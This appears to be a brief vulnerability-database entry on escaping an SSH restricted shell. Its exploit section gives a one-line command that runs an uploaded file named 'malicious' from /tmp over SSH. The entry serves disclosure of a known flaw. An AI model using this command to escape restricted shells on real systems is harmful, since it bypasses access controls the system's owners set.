• info
• discussion
• exploit
• solution
• references

SSH Restricted Shell Escaping Command Execution Vulnerability

After uploading 'malicious' to /tmp:

ssh -l user host '/tmp/malicious'